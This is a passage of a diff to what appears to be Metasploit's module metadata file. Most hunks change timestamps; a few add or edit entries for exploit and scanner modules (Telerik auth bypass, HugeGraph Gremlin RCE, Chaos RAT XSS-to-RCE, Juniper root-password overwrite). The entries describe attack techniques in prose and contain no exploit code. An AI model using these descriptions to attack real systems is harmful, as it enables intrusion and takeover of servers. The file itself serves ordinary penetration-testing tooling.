    "is_install_path": true,
    "ref_name": "scanner/http/directadmin_login",
@@ -33136,7 +33819,7 @@
      "https"
    ],
    "targets": null,
-    "mod_time": "2023-09-18 06:56:18 +0000",
+    "mod_time": "2024-07-24 16:42:43 +0000",
    "path": "/modules/auxiliary/scanner/http/emby_ssrf_scanner.rb",
    "is_install_path": true,
    "ref_name": "scanner/http/emby_ssrf_scanner",
@@ -34135,7 +34818,7 @@
      "https"
    ],
    "targets": null,
-    "mod_time": "2022-01-23 15:28:32 +0000",
+    "mod_time": "2024-07-24 16:42:43 +0000",
    "path": "/modules/auxiliary/scanner/http/fortimail_login_bypass_detection.rb",
    "is_install_path": true,
    "ref_name": "scanner/http/fortimail_login_bypass_detection",
@@ -34503,7 +35186,7 @@
      "https"
    ],
    "targets": null,
-    "mod_time": "2022-01-23 15:28:32 +0000",
+    "mod_time": "2024-05-03 10:45:37 +0000",
    "path": "/modules/auxiliary/scanner/http/gitlab_login.rb",
    "is_install_path": true,
    "ref_name": "scanner/http/gitlab_login",
@@ -34655,7 +35338,7 @@
      "https"
    ],
    "targets": null,
-    "mod_time": "2021-09-02 11:41:27 +0000",
+    "mod_time": "2024-05-03 10:45:37 +0000",
    "path": "/modules/auxiliary/scanner/http/glassfish_login.rb",
    "is_install_path": true,
    "ref_name": "scanner/http/glassfish_login",
@@ -35411,7 +36094,7 @@
      "https"
    ],
    "targets": null,
-    "mod_time": "2021-09-02 11:41:27 +0000",
+    "mod_time": "2024-05-03 10:45:37 +0000",
    "path": "/modules/auxiliary/scanner/http/hp_sys_mgmt_login.rb",
    "is_install_path": true,
    "ref_name": "scanner/http/hp_sys_mgmt_login",
@@ -35565,7 +36248,7 @@
      "https"
    ],
    "targets": null,
-    "mod_time": "2024-01-07 15:02:53 +0000",
+    "mod_time": "2024-05-03 10:45:37 +0000",
    "path": "/modules/auxiliary/scanner/http/http_login.rb",
    "is_install_path": true,
    "ref_name": "scanner/http/http_login",
@@ -36266,7 +36949,7 @@
      "https"
    ],
    "targets": null,
-    "mod_time": "2021-08-31 17:10:07 +0000",
+    "mod_time": "2024-05-03 10:45:37 +0000",
    "path": "/modules/auxiliary/scanner/http/ipboard_login.rb",
    "is_install_path": true,
    "ref_name": "scanner/http/ipboard_login",
@@ -36530,7 +37213,7 @@
      "https"
    ],
    "targets": null,
-    "mod_time": "2023-06-12 14:08:03 +0000",
+    "mod_time": "2024-08-01 15:09:20 +0000",
    "path": "/modules/auxiliary/scanner/http/jenkins_login.rb",
    "is_install_path": true,
    "ref_name": "scanner/http/jenkins_login",
@@ -37006,7 +37689,7 @@
      "https"
    ],
    "targets": null,
-    "mod_time": "2021-08-31 15:37:48 +0000",
+    "mod_time": "2024-05-03 10:45:37 +0000",
    "path": "/modules/auxiliary/scanner/http/jupyter_login.rb",
    "is_install_path": true,
    "ref_name": "scanner/http/jupyter_login",
@@ -37505,7 +38188,7 @@
      "https"
    ],
    "targets": null,
-    "mod_time": "2022-11-07 12:23:59 +0000",
+    "mod_time": "2024-05-03 10:45:37 +0000",
    "path": "/modules/auxiliary/scanner/http/manageengine_desktop_central_login.rb",
    "is_install_path": true,
    "ref_name": "scanner/http/manageengine_desktop_central_login",
@@ -38030,7 +38713,7 @@
      "https"
    ],
    "targets": null,
-    "mod_time": "2021-08-31 16:50:37 +0000",
+    "mod_time": "2024-05-03 10:45:37 +0000",
    "path": "/modules/auxiliary/scanner/http/mybook_live_login.rb",
    "is_install_path": true,
    "ref_name": "scanner/http/mybook_live_login",
@@ -38500,7 +39183,7 @@
      "https"
    ],
    "targets": null,
-    "mod_time": "2021-08-31 17:10:07 +0000",
+    "mod_time": "2024-05-03 10:45:37 +0000",
    "path": "/modules/auxiliary/scanner/http/octopusdeploy_login.rb",
    "is_install_path": true,
    "ref_name": "scanner/http/octopusdeploy_login",
@@ -39072,7 +39755,7 @@
      "https"
    ],
    "targets": null,
-    "mod_time": "2021-08-31 17:10:07 +0000",
+    "mod_time": "2024-05-03 10:45:37 +0000",
    "path": "/modules/auxiliary/scanner/http/phpmyadmin_login.rb",
    "is_install_path": true,
    "ref_name": "scanner/http/phpmyadmin_login",
@@ -40624,7 +41307,7 @@
      "https"
    ],
    "targets": null,
-    "mod_time": "2023-02-28 15:40:03 +0000",
+    "mod_time": "2024-05-03 10:45:37 +0000",
    "path": "/modules/auxiliary/scanner/http/softing_sis_login.rb",
    "is_install_path": true,
    "ref_name": "scanner/http/softing_sis_login",
@@ -41325,7 +42008,7 @@
      "https"
    ],
    "targets": null,
-    "mod_time": "2021-08-31 17:10:07 +0000",
+    "mod_time": "2024-05-03 10:45:37 +0000",
    "path": "/modules/auxiliary/scanner/http/symantec_web_gateway_login.rb",
    "is_install_path": true,
    "ref_name": "scanner/http/symantec_web_gateway_login",
@@ -41375,7 +42058,7 @@
      "https"
    ],
    "targets": null,
-    "mod_time": "2022-09-16 13:34:06 +0000",
+    "mod_time": "2024-05-03 10:45:37 +0000",
    "path": "/modules/auxiliary/scanner/http/syncovery_linux_login.rb",
    "is_install_path": true,
    "ref_name": "scanner/http/syncovery_linux_login",
@@ -41435,7 +42118,7 @@
      "https"
    ],
    "targets": null,
-    "mod_time": "2022-12-14 08:59:53 +0000",
+    "mod_time": "2024-05-03 10:45:37 +0000",
    "path": "/modules/auxiliary/scanner/http/syncovery_linux_token_cve_2022_36536.rb",
    "is_install_path": true,
    "ref_name": "scanner/http/syncovery_linux_token_cve_2022_36536",
@@ -41522,6 +42205,74 @@

    ]
  },
+  "auxiliary_scanner/http/telerik_report_server_auth_bypass": {
+    "name": "Telerik Report Server Auth Bypass",
+    "fullname": "auxiliary/scanner/http/telerik_report_server_auth_bypass",
+    "aliases": [
+
+    ],
+    "rank": 300,
+    "disclosure_date": "2024-06-04",
+    "type": "auxiliary",
+    "author": [
+      "SinSinology",
+      "Spencer McIntyre"
+    ],
+    "description": "This module exploits an authentication bypass vulnerability in Telerik Report Server versions 10.0.24.305 and\n          prior which allows an unauthenticated attacker to create a new account with administrative privileges. The\n          vulnerability leverages the initial setup page which is still accessible once the setup process has completed.\n\n          If either USERNAME or PASSWORD are not specified, then a random value will be selected. The module will fail if\n          the specified USERNAME already exists.",
+    "references": [
+      "CVE-2024-4358",
+      "URL-https://summoning.team/blog/progress-report-server-rce-cve-2024-4358-cve-2024-1800/"
+    ],
+    "platform": "",
+    "arch": "",
+    "rport": 83,
+    "autofilter_ports": [
+      80,
+      8080,
+      443,
+      8000,
+      8888,
+      8880,
+      8008,
+      3000,
+      8443
+    ],
+    "autofilter_services": [
+      "http",
+      "https"
+    ],
+    "targets": null,
+    "mod_time": "2024-06-07 11:27:42 +0000",
+    "path": "/modules/auxiliary/scanner/http/telerik_report_server_auth_bypass.rb",
+    "is_install_path": true,
+    "ref_name": "scanner/http/telerik_report_server_auth_bypass",
+    "check": true,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+      "Stability": [
+        "crash-safe"
+      ],
+      "SideEffects": [
+        "ioc-in-logs"
+      ],
+      "Reliability": [
+
+      ]
+    },
+    "session_types": false,
+    "needs_cleanup": false,
+    "actions": [
+      {
+        "name": "CHECK",
+        "description": "Check for the vulnerability"
+      },
+      {
+        "name": "EXPLOIT",
+        "description": "Exploit the vulnerability"
+      }
+    ]
+  },
  "auxiliary_scanner/http/thinvnc_traversal": {
    "name": "ThinVNC Directory Traversal",
    "fullname": "auxiliary/scanner/http/thinvnc_traversal",
@@ -41788,7 +42539,7 @@
      "https"
    ],
    "targets": null,
-    "mod_time": "2022-11-27 15:35:34 +0000",
+    "mod_time": "2024-05-03 10:45:37 +0000",
    "path": "/modules/auxiliary/scanner/http/tomcat_mgr_login.rb",
    "is_install_path": true,
    "ref_name": "scanner/http/tomcat_mgr_login",
@@ -42979,7 +43730,7 @@
      "https"
    ],
    "targets": null,
-    "mod_time": "2024-01-07 15:02:53 +0000",
+    "mod_time": "2024-05-03 10:45:37 +0000",
    "path": "/modules/auxiliary/scanner/http/wordpress_multicall_creds.rb",
    "is_install_path": true,
    "ref_name": "scanner/http/wordpress_multicall_creds",
@@ -43138,7 +43889,7 @@
      "https"
    ],
    "targets": null,
-    "mod_time": "2021-08-31 17:10:07 +0000",
+    "mod_time": "2024-05-03 10:45:37 +0000",
    "path": "/modules/auxiliary/scanner/http/wordpress_xmlrpc_login.rb",
    "is_install_path": true,
    "ref_name": "scanner/http/wordpress_xmlrpc_login",
@@ -44797,7 +45548,7 @@
      "https"
    ],
    "targets": null,
-    "mod_time": "2021-09-02 11:41:27 +0000",
+    "mod_time": "2024-05-03 10:45:37 +0000",
    "path": "/modules/auxiliary/scanner/http/zabbix_login.rb",
    "is_install_path": true,
    "ref_name": "scanner/http/zabbix_login",
@@ -45402,7 +46153,7 @@

    ],
    "targets": null,
-    "mod_time": "2024-04-11 17:56:24 +0000",
+    "mod_time": "2024-06-03 11:02:15 +0000",
    "path": "/modules/auxiliary/scanner/ldap/ldap_login.rb",
    "is_install_path": true,
    "ref_name": "scanner/ldap/ldap_login",
@@ -46088,7 +46839,7 @@

    ],
    "targets": null,
-    "mod_time": "2022-07-01 12:22:31 +0000",
+    "mod_time": "2024-05-03 10:45:37 +0000",
    "path": "/modules/auxiliary/scanner/misc/freeswitch_event_socket_login.rb",
    "is_install_path": true,
    "ref_name": "scanner/misc/freeswitch_event_socket_login",
@@ -46820,7 +47571,7 @@

    ],
    "targets": null,
-    "mod_time": "2021-08-31 17:10:07 +0000",
+    "mod_time": "2024-05-03 10:45:37 +0000",
    "path": "/modules/auxiliary/scanner/mqtt/connect.rb",
    "is_install_path": true,
    "ref_name": "scanner/mqtt/connect",
@@ -47159,7 +47910,7 @@
      "sybase"
    ],
    "targets": null,
-    "mod_time": "2024-04-04 08:34:51 +0000",
+    "mod_time": "2024-03-05 13:27:00 +0000",
    "path": "/modules/auxiliary/scanner/mssql/mssql_hashdump.rb",
    "is_install_path": true,
    "ref_name": "scanner/mssql/mssql_hashdump",
@@ -47210,7 +47961,7 @@
      "sybase"
    ],
    "targets": null,
-    "mod_time": "2024-04-18 15:15:36 +0000",
+    "mod_time": "2024-06-03 11:02:15 +0000",
    "path": "/modules/auxiliary/scanner/mssql/mssql_login.rb",
    "is_install_path": true,
    "ref_name": "scanner/mssql/mssql_login",
@@ -47237,7 +47988,7 @@
    "author": [
      "MC <mc@metasploit.com>"
    ],
-    "description": "This module simply queries the MSSQL instance for information.",
+    "description": "This module simply queries the MSSQL Browser service for server information.",
    "references": [

    ],
@@ -47259,7 +48010,7 @@
      "sybase"
    ],
    "targets": null,
-    "mod_time": "2019-03-05 03:38:51 +0000",
+    "mod_time": "2024-03-04 11:44:04 +0000",
    "path": "/modules/auxiliary/scanner/mssql/mssql_ping.rb",
    "is_install_path": true,
    "ref_name": "scanner/mssql/mssql_ping",
@@ -47308,7 +48059,7 @@
      "sybase"
    ],
    "targets": null,
-    "mod_time": "2024-04-04 08:34:51 +0000",
+    "mod_time": "2024-03-05 13:27:00 +0000",
    "path": "/modules/auxiliary/scanner/mssql/mssql_schemadump.rb",
    "is_install_path": true,
    "ref_name": "scanner/mssql/mssql_schemadump",
@@ -47325,6 +48076,57 @@

    ]
  },
+  "auxiliary_scanner/mssql/mssql_version": {
+    "name": "MSSQL Version Utility",
+    "fullname": "auxiliary/scanner/mssql/mssql_version",
+    "aliases": [
+
+    ],
+    "rank": 300,
+    "disclosure_date": null,
+    "type": "auxiliary",
+    "author": [
+      "Zach Goldman"
+    ],
+    "description": "Executes a TDS7 pre-login request against the MSSQL instance to query for version information.",
+    "references": [
+
+    ],
+    "platform": "",
+    "arch": "",
+    "rport": 1433,
+    "autofilter_ports": [
+      1433,
+      1434,
+      1435,
+      14330,
+      2533,
+      9152,
+      2638
+    ],
+    "autofilter_services": [
+      "ms-sql-s",
+      "ms-sql2000",
+      "sybase"
+    ],
+    "targets": null,
+    "mod_time": "2024-04-22 14:46:50 +0000",
+    "path": "/modules/auxiliary/scanner/mssql/mssql_version.rb",
+    "is_install_path": true,
+    "ref_name": "scanner/mssql/mssql_version",
+    "check": false,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+    },
+    "session_types": [
+      "mssql"
+    ],
+    "needs_cleanup": false,
+    "actions": [
+
+    ]
+  },
  "auxiliary_scanner/mysql/mysql_authbypass_hashdump": {
    "name": "MySQL Authentication Bypass Password Dump",
    "fullname": "auxiliary/scanner/mysql/mysql_authbypass_hashdump",
@@ -47482,7 +48284,7 @@

    ],
    "targets": null,
-    "mod_time": "2024-04-10 12:24:08 +0000",
+    "mod_time": "2024-05-21 11:00:24 +0000",
    "path": "/modules/auxiliary/scanner/mysql/mysql_login.rb",
    "is_install_path": true,
    "ref_name": "scanner/mysql/mysql_login",
@@ -47743,7 +48545,7 @@
      "https"
    ],
    "targets": null,
-    "mod_time": "2023-05-11 13:01:46 +0000",
+    "mod_time": "2024-05-03 10:45:37 +0000",
    "path": "/modules/auxiliary/scanner/nessus/nessus_rest_login.rb",
    "is_install_path": true,
    "ref_name": "scanner/nessus/nessus_rest_login",
@@ -49219,7 +50021,7 @@

    ],
    "targets": null,
-    "mod_time": "2022-01-23 15:28:32 +0000",
+    "mod_time": "2024-05-03 10:45:37 +0000",
    "path": "/modules/auxiliary/scanner/pop3/pop3_login.rb",
    "is_install_path": true,
    "ref_name": "scanner/pop3/pop3_login",
@@ -49638,7 +50440,7 @@
      "postgres"
    ],
    "targets": null,
-    "mod_time": "2024-04-12 11:43:30 +0000",
+    "mod_time": "2024-06-03 11:02:15 +0000",
    "path": "/modules/auxiliary/scanner/postgres/postgres_login.rb",
    "is_install_path": true,
    "ref_name": "scanner/postgres/postgres_login",
@@ -50436,7 +51238,7 @@

    ],
    "targets": null,
-    "mod_time": "2022-01-23 15:28:32 +0000",
+    "mod_time": "2024-06-28 10:21:08 +0000",
    "path": "/modules/auxiliary/scanner/redis/redis_login.rb",
    "is_install_path": true,
    "ref_name": "scanner/redis/redis_login",
@@ -50602,7 +51404,7 @@

    ],
    "targets": null,
-    "mod_time": "2024-02-22 14:18:29 +0000",
+    "mod_time": "2024-06-03 11:02:15 +0000",
    "path": "/modules/auxiliary/scanner/rservices/rexec_login.rb",
    "is_install_path": true,
    "ref_name": "scanner/rservices/rexec_login",
@@ -50644,7 +51446,7 @@

    ],
    "targets": null,
-    "mod_time": "2024-02-22 14:18:29 +0000",
+    "mod_time": "2024-05-21 11:00:24 +0000",
    "path": "/modules/auxiliary/scanner/rservices/rlogin_login.rb",
    "is_install_path": true,
    "ref_name": "scanner/rservices/rlogin_login",
@@ -50686,7 +51488,7 @@

    ],
    "targets": null,
-    "mod_time": "2024-02-22 14:18:29 +0000",
+    "mod_time": "2024-06-03 11:02:15 +0000",
    "path": "/modules/auxiliary/scanner/rservices/rsh_login.rb",
    "is_install_path": true,
    "ref_name": "scanner/rservices/rsh_login",
@@ -50770,7 +51572,7 @@

    ],
    "targets": null,
-    "mod_time": "2021-08-31 17:10:07 +0000",
+    "mod_time": "2024-05-03 10:45:37 +0000",
    "path": "/modules/auxiliary/scanner/sage/x3_adxsrv_login.rb",
    "is_install_path": true,
    "ref_name": "scanner/sage/x3_adxsrv_login",
@@ -52637,7 +53439,7 @@

    ],
    "targets": null,
-    "mod_time": "2022-08-01 15:11:57 +0000",
+    "mod_time": "2024-07-24 16:42:43 +0000",
    "path": "/modules/auxiliary/scanner/scada/bacnet_l3.rb",
    "is_install_path": true,
    "ref_name": "scanner/scada/bacnet_l3",
@@ -53260,7 +54062,7 @@

    ],
    "targets": null,
-    "mod_time": "2017-07-24 06:26:21 +0000",
+    "mod_time": "2024-06-13 15:30:31 +0000",
    "path": "/modules/auxiliary/scanner/scada/profinet_siemens.rb",
    "is_install_path": true,
    "ref_name": "scanner/scada/profinet_siemens",
@@ -53940,7 +54742,7 @@
      "microsoft-ds"
    ],
    "targets": null,
-    "mod_time": "2024-04-22 10:44:57 +0000",
+    "mod_time": "2024-05-07 10:54:35 +0000",
    "path": "/modules/auxiliary/scanner/smb/smb_enumusers.rb",
    "is_install_path": true,
    "ref_name": "scanner/smb/smb_enumusers",
@@ -54034,7 +54836,7 @@
      "microsoft-ds"
    ],
    "targets": null,
-    "mod_time": "2024-04-09 15:24:02 +0000",
+    "mod_time": "2024-06-03 11:02:15 +0000",
    "path": "/modules/auxiliary/scanner/smb/smb_login.rb",
    "is_install_path": true,
    "ref_name": "scanner/smb/smb_login",
@@ -54067,7 +54869,7 @@
    ],
    "platform": "",
    "arch": "",
-    "rport": null,
+    "rport": 445,
    "autofilter_ports": [
      139,
      445
@@ -54077,7 +54879,7 @@
      "microsoft-ds"
    ],
    "targets": null,
-    "mod_time": "2024-02-02 14:26:43 +0000",
+    "mod_time": "2024-05-16 10:45:25 +0000",
    "path": "/modules/auxiliary/scanner/smb/smb_lookupsid.rb",
    "is_install_path": true,
    "ref_name": "scanner/smb/smb_lookupsid",
@@ -54237,7 +55039,7 @@
      "microsoft-ds"
    ],
    "targets": null,
-    "mod_time": "2023-01-25 13:58:29 +0000",
+    "mod_time": "2024-05-07 10:54:35 +0000",
    "path": "/modules/auxiliary/scanner/smb/smb_version.rb",
    "is_install_path": true,
    "ref_name": "scanner/smb/smb_version",
@@ -55031,7 +55833,7 @@

    ],
    "targets": null,
-    "mod_time": "2024-04-08 17:41:59 +0000",
+    "mod_time": "2024-05-03 10:45:37 +0000",
    "path": "/modules/auxiliary/scanner/snmp/snmp_login.rb",
    "is_install_path": true,
    "ref_name": "scanner/snmp/snmp_login",
@@ -55326,7 +56128,7 @@

    ],
    "targets": null,
-    "mod_time": "2024-02-22 14:18:29 +0000",
+    "mod_time": "2024-06-03 11:02:15 +0000",
    "path": "/modules/auxiliary/scanner/ssh/eaton_xpert_backdoor.rb",
    "is_install_path": true,
    "ref_name": "scanner/ssh/eaton_xpert_backdoor",
@@ -55372,7 +56174,7 @@

    ],
    "targets": null,
-    "mod_time": "2024-02-22 14:18:29 +0000",
+    "mod_time": "2024-06-03 11:02:15 +0000",
    "path": "/modules/auxiliary/scanner/ssh/fortinet_backdoor.rb",
    "is_install_path": true,
    "ref_name": "scanner/ssh/fortinet_backdoor",
@@ -55461,7 +56263,7 @@

    ],
    "targets": null,
-    "mod_time": "2021-08-31 15:37:48 +0000",
+    "mod_time": "2024-05-03 10:45:37 +0000",
    "path": "/modules/auxiliary/scanner/ssh/karaf_login.rb",
    "is_install_path": true,
    "ref_name": "scanner/ssh/karaf_login",
@@ -55504,7 +56306,7 @@

    ],
    "targets": null,
-    "mod_time": "2024-02-22 14:18:29 +0000",
+    "mod_time": "2024-06-03 11:02:15 +0000",
    "path": "/modules/auxiliary/scanner/ssh/libssh_auth_bypass.rb",
    "is_install_path": true,
    "ref_name": "scanner/ssh/libssh_auth_bypass",
@@ -55705,7 +56507,7 @@

    ],
    "targets": null,
-    "mod_time": "2024-02-22 14:18:29 +0000",
+    "mod_time": "2024-05-21 11:00:24 +0000",
    "path": "/modules/auxiliary/scanner/ssh/ssh_login.rb",
    "is_install_path": true,
    "ref_name": "scanner/ssh/ssh_login",
@@ -55747,7 +56549,7 @@

    ],
    "targets": null,
-    "mod_time": "2024-02-22 14:18:29 +0000",
+    "mod_time": "2024-06-03 11:02:15 +0000",
    "path": "/modules/auxiliary/scanner/ssh/ssh_login_pubkey.rb",
    "is_install_path": true,
    "ref_name": "scanner/ssh/ssh_login_pubkey",
@@ -56163,7 +56965,7 @@
      "telnet"
    ],
    "targets": null,
-    "mod_time": "2024-02-22 14:18:29 +0000",
+    "mod_time": "2024-06-03 11:02:15 +0000",
    "path": "/modules/auxiliary/scanner/telnet/brocade_enable_login.rb",
    "is_install_path": true,
    "ref_name": "scanner/telnet/brocade_enable_login",
@@ -56375,7 +57177,7 @@
      "telnet"
    ],
    "targets": null,
-    "mod_time": "2024-02-22 14:18:29 +0000",
+    "mod_time": "2024-06-03 11:02:15 +0000",
    "path": "/modules/auxiliary/scanner/telnet/telnet_login.rb",
    "is_install_path": true,
    "ref_name": "scanner/telnet/telnet_login",
@@ -56899,7 +57701,7 @@

    ],
    "targets": null,
-    "mod_time": "2019-06-27 17:06:32 +0000",
+    "mod_time": "2024-05-03 10:45:37 +0000",
    "path": "/modules/auxiliary/scanner/varnish/varnish_cli_login.rb",
    "is_install_path": true,
    "ref_name": "scanner/varnish/varnish_cli_login",
@@ -56990,7 +57792,7 @@

    ],
    "targets": null,
-    "mod_time": "2021-08-31 17:10:07 +0000",
+    "mod_time": "2024-05-03 10:45:37 +0000",
    "path": "/modules/auxiliary/scanner/vmware/vmauthd_login.rb",
    "is_install_path": true,
    "ref_name": "scanner/vmware/vmauthd_login",
@@ -57584,7 +58386,7 @@

    ],
    "targets": null,
-    "mod_time": "2021-08-31 17:10:07 +0000",
+    "mod_time": "2024-05-03 10:45:37 +0000",
    "path": "/modules/auxiliary/scanner/vnc/vnc_login.rb",
    "is_install_path": true,
    "ref_name": "scanner/vnc/vnc_login",
@@ -57961,7 +58763,7 @@
      "winrm"
    ],
    "targets": null,
-    "mod_time": "2024-02-22 14:18:29 +0000",
+    "mod_time": "2024-06-03 11:02:15 +0000",
    "path": "/modules/auxiliary/scanner/winrm/winrm_login.rb",
    "is_install_path": true,
    "ref_name": "scanner/winrm/winrm_login",
@@ -62422,7 +63224,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2023-06-02 10:22:56 +0000",
+    "mod_time": "2024-06-13 15:46:02 +0000",
    "path": "/modules/encoders/cmd/powershell_base64.rb",
    "is_install_path": true,
    "ref_name": "cmd/powershell_base64",
@@ -65611,7 +66413,7 @@
      "Citrix ADC 12.1-65.25",
      "Citrix ADC 12.1-64.17"
    ],
-    "mod_time": "2023-08-07 12:50:23 +0000",
+    "mod_time": "2024-07-24 16:42:43 +0000",
    "path": "/modules/exploits/freebsd/http/citrix_formssso_target_rce.rb",
    "is_install_path": true,
    "ref_name": "freebsd/http/citrix_formssso_target_rce",
@@ -65644,9 +66446,10 @@
    "author": [
      "Jacob Baines",
      "Ron Bowes",
-      "jheysel-r7"
+      "jheysel-r7",
+      "Fabian Hafner"
    ],
-    "description": "This module exploits a PHP environment variable manipulation vulnerability affecting Juniper SRX firewalls\n          and EX switches. The affected Juniper devices run FreeBSD and every FreeBSD process can access their stdin\n          by opening /dev/fd/0. The exploit also makes use of two useful PHP features. The first being\n          'auto_prepend_file' which causes the provided file to be added using the 'require' function. The second PHP\n          function is 'allow_url_include' which allows the use of URL-aware fopen wrappers. By enabling\n          allow_url_include, the exploit can use any protocol wrapper with auto_prepend_file. The module then uses\n          data:// to provide a file inline which includes the base64 encoded PHP payload.\n\n          By default this exploit returns a session confined to a FreeBSD jail with limited functionality. There is a\n          datastore option 'JAIL_BREAK', that when set to true, will steal the necessary tokens from a user authenticated\n          to the J-Web application, in order to overwrite the root password hash. If there is no user\n          authenticated to the J-Web application this method will not work. The module then authenticates\n          with the new root password over SSH and then rewrites the original root password hash to /etc/master.passwd.",
+    "description": "This module exploits a PHP environment variable manipulation vulnerability affecting Juniper SRX firewalls\n          and EX switches. The affected Juniper devices run FreeBSD and every FreeBSD process can access their stdin\n          by opening /dev/fd/0. The exploit also makes use of two useful PHP features. The first being\n          'auto_prepend_file' which causes the provided file to be added using the 'require' function. The second PHP\n          function is 'allow_url_include' which allows the use of URL-aware fopen wrappers. By enabling\n          allow_url_include, the exploit can use any protocol wrapper with auto_prepend_file. The module then uses\n          data:// to provide a file inline which includes the base64 encoded PHP payload.\n\n          By default this exploit returns a session confined to a FreeBSD jail with limited functionality. There is a\n          datastore option 'JAIL_BREAK', that when set to true, will steal the necessary tokens from a user authenticated\n          to the J-Web application, in order to overwrite the root password hash. If there is no user authenticated\n          to the J-Web application this exploit will try to create one. If unsuccesfull this method will not work.\n          The module then authenticates with the new root password over SSH and then rewrites the original root password\n          hash to /etc/master.passwd. There is an option to set allow ssh root login, if disabled.",
    "references": [
      "URL-https://labs.watchtowr.com/cve-2023-36844-and-friends-rce-in-juniper-firewalls/",
      "URL-https://vulncheck.com/blog/juniper-cve-2023-36845",
@@ -65675,7 +66478,7 @@
      "PHP In-Memory",
      "Interactive SSH with jail break"
    ],
-    "mod_time": "2024-04-15 11:06:50 +0000",
+    "mod_time": "2024-06-14 10:45:19 +0000",
    "path": "/modules/exploits/freebsd/http/junos_phprc_auto_prepend_file.rb",
    "is_install_path": true,
    "ref_name": "freebsd/http/junos_phprc_auto_prepend_file",
@@ -66490,7 +67293,7 @@
    "targets": [
      "Generic RAR file"
    ],
-    "mod_time": "2022-08-22 11:46:50 +0000",
+    "mod_time": "2024-05-28 14:01:31 +0000",
    "path": "/modules/exploits/linux/fileformat/unrar_cve_2022_30333.rb",
    "is_install_path": true,
    "ref_name": "linux/fileformat/unrar_cve_2022_30333",
@@ -67203,6 +68006,66 @@
    "session_types": false,
    "needs_cleanup": null
  },
+  "exploit_linux/http/apache_hugegraph_gremlin_rce": {
+    "name": "Apache HugeGraph Gremlin RCE",
+    "fullname": "exploit/linux/http/apache_hugegraph_gremlin_rce",
+    "aliases": [
+
+    ],
+    "rank": 600,
+    "disclosure_date": "2024-04-22",
+    "type": "exploit",
+    "author": [
+      "6right",
+      "jheysel-r7"
+    ],
+    "description": "This module exploits CVE-2024-27348 which is a Remote Code Execution (RCE) vulnerability that exists in\n          Apache HugeGraph Server in versions before 1.3.0. An attacker can bypass the sandbox restrictions and achieve\n          RCE through Gremlin, resulting in complete control over the server",
+    "references": [
+      "URL-https://blog.securelayer7.net/remote-code-execution-in-apache-hugegraph/",
+      "CVE-2024-27348"
+    ],
+    "platform": "Linux,Unix",
+    "arch": "cmd",
+    "rport": 8080,
+    "autofilter_ports": [
+      80,
+      8080,
+      443,
+      8000,
+      8888,
+      8880,
+      8008,
+      3000,
+      8443
+    ],
+    "autofilter_services": [
+      "http",
+      "https"
+    ],
+    "targets": [
+      "Automatic Target"
+    ],
+    "mod_time": "2024-08-13 08:48:33 +0000",
+    "path": "/modules/exploits/linux/http/apache_hugegraph_gremlin_rce.rb",
+    "is_install_path": true,
+    "ref_name": "linux/http/apache_hugegraph_gremlin_rce",
+    "check": true,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+      "Stability": [
+        "crash-safe"
+      ],
+      "SideEffects": [
+        "artifacts-on-disk"
+      ],
+      "Reliability": [
+        "repeatable-session"
+      ]
+    },
+    "session_types": false,
+    "needs_cleanup": null
+  },
  "exploit_linux/http/apache_nifi_h2_rce": {
    "name": "Apache NiFi H2 Connection String Remote Code Execution",
    "fullname": "exploit/linux/http/apache_nifi_h2_rce",
@@ -67572,7 +68435,7 @@
    "targets": [
      "Automatic Target"
    ],
-    "mod_time": "2023-10-10 15:21:35 +0000",
+    "mod_time": "2024-07-24 16:42:43 +0000",
    "path": "/modules/exploits/linux/http/apache_superset_cookie_sig_rce.rb",
    "is_install_path": true,
    "ref_name": "linux/http/apache_superset_cookie_sig_rce",
@@ -68593,6 +69456,69 @@
    "session_types": false,
    "needs_cleanup": true
  },
+  "exploit_linux/http/chaos_rat_xss_to_rce": {
+    "name": "Chaos RAT XSS to RCE",
+    "fullname": "exploit/linux/http/chaos_rat_xss_to_rce",
+    "aliases": [
+
+    ],
+    "rank": 600,
+    "disclosure_date": "2024-04-10",
+    "type": "exploit",
+    "author": [
+      "h00die",
+      "chebuya"
+    ],
+    "description": "CHAOS v5.0.8 is a free and open-source Remote Administration Tool that\n          allows generated binaries to control remote operating systems. The\n          webapp contains a remote command execution vulnerability which\n          can be triggered by an authenticated user when generating a new\n          executable. The webapp also contains an XSS vulnerability within\n          the view of a returned command being executed on an agent.\n\n          Execution can happen through one of three routes:\n\n          1. Provided credentials can be used to execute the RCE directly\n\n          2. A JWT token from an agent can be provided to emulate a compromised\n          host. If a logged in user attempts to execute a command on the host\n          the returned value contains an xss payload.\n\n          3. Similar to technique 2, an agent executable can be provided and the\n          JWT token can be extracted.\n\n          Verified against CHAOS 7d5b20ad7e58e5b525abdcb3a12514b88e87cef2 running\n          in a docker container.",
+    "references": [
+      "URL-https://github.com/chebuya/CVE-2024-30850-chaos-rat-rce-poc",
+      "URL-https://github.com/tiagorlampert/CHAOS",
+      "CVE-2024-31839",
+      "CVE-2024-30850"
+    ],
+    "platform": "Linux,Unix",
+    "arch": "cmd",
+    "rport": 8080,
+    "autofilter_ports": [
+      80,
+      8080,
+      443,
+      8000,
+      8888,
+      8880,
+      8008,
+      3000,
+      8443
+    ],
+    "autofilter_services": [
+      "http",
+      "https"
+    ],
+    "targets": [
+      "Automatic Target"
+    ],
+    "mod_time": "2024-05-13 16:55:43 +0000",
+    "path": "/modules/exploits/linux/http/chaos_rat_xss_to_rce.rb",
+    "is_install_path": true,
+    "ref_name": "linux/http/chaos_rat_xss_to_rce",
+    "check": true,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+      "Stability": [
+        "crash-safe"
+      ],
+      "Reliability": [
+        "event-dependent",
+        "repeatable-session"
+      ],
+      "SideEffects": [
+        "artifacts-on-disk"
+      ]
+    },
+    "session_types": false,
+    "needs_cleanup": null
+  },
  "exploit_linux/http/cisco_asax_sfr_rce": {
    "name": "Cisco ASA-X with FirePOWER Services Authenticated Command Injection",
    "fullname": "exploit/linux/http/cisco_asax_sfr_rce",
@@ -70961,11 +71887,16 @@
    "type": "exploit",
    "author": [
      "Spencer McIntyre",
-      "Erik Daguerre"
+      "Erik Daguerre",
+      "ACE-Responder",
+      "Takahiro Yokoyama"
    ],
-    "description": "A vulnerability existed in the PowerShellEmpire server prior to commit\n        f030cf62 which would allow an arbitrary file to be written to an\n        attacker controlled location with the permissions of the Empire server.\n\n        This exploit will write the payload to /tmp/ directory followed by a\n        cron.d file to execute the payload.",
